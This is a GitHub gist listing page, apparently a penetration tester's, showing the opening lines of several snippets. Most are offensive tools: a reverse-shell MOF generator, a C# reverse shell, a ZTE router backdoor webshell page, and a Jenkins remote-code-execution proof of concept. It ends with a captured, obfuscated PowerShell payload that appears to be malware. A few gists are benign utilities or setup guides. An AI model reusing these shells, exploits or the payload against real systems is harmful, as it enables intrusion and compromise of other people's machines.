Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View xax007's full-sized avatar

xax007

23 followers · 1 following
  • Error: Unable to resolve
View GitHub Profile
@xax007
xax007 / rename-file.py
Created November 10, 2018 03:25
Python - Change the pdf file name from 'blahblah-abc.pdf' to 'Abc-blahblah.pdf'
import os
def main():
for root, dirs, files in os.walk(os.getcwd()):
for file in files:
filename, file_extension = os.path.splitext(file)
if file_extension.startswith('.pdf'):
# change pdf files filename from 'blahblah-abc' to 'Abc-blahblah'
new_filename = filename.split('-')[1].title() + '-' + filename.split('-')[0]
@xax007
xax007 / generate_reverse_shell_mof.py
Last active November 10, 2018 10:24
Generate reverse shell mof file via msfvenom
import sys
import string
import random
def add_vbs_to_mof(vbs_code):
random_class_name = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(32)][:6]).title()
mof_template = "#pragma namespace (\"\\\\\\\\.\\\\root\\\\subscription\")\n" \
"\n" \
"class MyReverseShellMofClass \n" \
@xax007
xax007 / HTTPutServer.py
Created November 17, 2018 04:49
Python HTTP PUT Server
import sys
import signal
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class PUTHandler(BaseHTTPRequestHandler):
def do_PUT(self):
length = int(self.headers['Content-Length'])
@xax007
xax007 / Simple_Rev_Shell.cs
Created November 18, 2018 06:25 — forked from BankSecurity/Simple_Rev_Shell.cs
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@xax007
xax007 / get_smb_version.py
Last active November 29, 2018 05:59
Get smb server version via impacket when smbclient or other smb enumerate tools(eg. enum4linux) can not get it.
#!/usr/bin/env python
# Copyright (c) 2003-2018 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: Mini shell using some of the SMB funcionality of the library
#
# Author:
@xax007
xax007 / web_shell_cmd.gch
Created November 30, 2018 11:32
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F460 Webshell
</title>
@xax007
xax007 / CVE-2019-1003000-Jenkins-RCE-POC.py
Created February 14, 2019 15:14 — forked from adamyordan/CVE-2019-1003000-Jenkins-RCE-POC.py
CVE-2019-1003000-Jenkins-RCE-POC
import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
@xax007
xax007 / README.md
Created March 16, 2019 09:09 — forked from Tom4t0/README.md
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

By default Microsoft active directory servers will offer LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

@xax007
xax007 / go-os-arch.md
Created April 11, 2019 02:30 — forked from asukakenji/0-go-os-arch.md
Go (Golang) GOOS and GOARCH

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.8.3 darwin/amd64.

A list of valid GOOS values

(Bold = supported by go out of the box, ie. without the help of a C compiler, etc.)

  • android
  • darwin
@xax007
xax007 / newol.dat
Created April 22, 2019 15:16
http://down.bddp.net/newol.dat?allv6 Response
This file has been truncated, but you can view the full file.
$epGjM = [Char[ ] ]"))93]rAhc[]GNiRtS[,'tprT'(ECalPer.)63]rAhc[]GNiRtS[,)55]rAhc[+18]rAhc[+411]rAhc[+28]rAhc[+211]rAhc[((ECalPer.)'|',)77]rAhc[+79]rAhc[+94]rAhc[+38]rAhc[+15]rAhc[((ECalPer.)43]rAhc[]GNiRtS[,'VMbWd'(ECalPer.)'
)tprTtprTNiOJ-tprTXtprT+]3,1[)(GnIRTSOt.EcneREfeRpesoBrEv7QrRp (. Ma1S3)69]rahc[,)89]rahc[+99]rahc[+79]rahc[+511]rahc[+84]rahc[( ecALPER- 43]rahc[,tprTmHLYsJtprT EcALpERc- 63]rahc[,tprTGDuihltprTecALPER-421]rahc[,tprTstMqQztprT ecALPER- 29]'+'rahc[,)35]rahc[+121]rahc[+89]rahc[+87]rahc[+45]rahc[+84]rahc[( ecALPER-93]rahc[,)17]rahc[+111]rahc[+27]rahc[+911]rahc[+68]rahc[+67]rahc[( EcALpERc-))tprTAvDREPQQ8Y0iEBjd3DEAAAAu8YWAEJ9MBAWjEBAAAoZhPAchAAAASm+3LG0//TUkoDgCKIVFNiEIkQUiIBgCK4XBNy0zLGEAKUAtF0ISAAw9HmbQGsOAAcv65GEAAAgypDgJDm0///rAoDXSLiUC0lchI5wiJBAAAQOhPAchYv4//TcboDXSLikDLmEAAAg+F+AwFi9i//f3DjuzLi00La8iNx8iFR+MFNAdAX4//vnToP9iLcXG7IBdJXISY50iIdwVIawRIiA6BL8iFcEiQgewCvIBHhIGoHswL+xiBlDBJiDBLCAAAQQrE0IOkw0iIJxcAAAAgSCl58fVNCAABsWhPAchYv4//TM9oDXTLm0DJGEAAAAkkw7iMBAAA87hPAAAAAIJMuDyLMg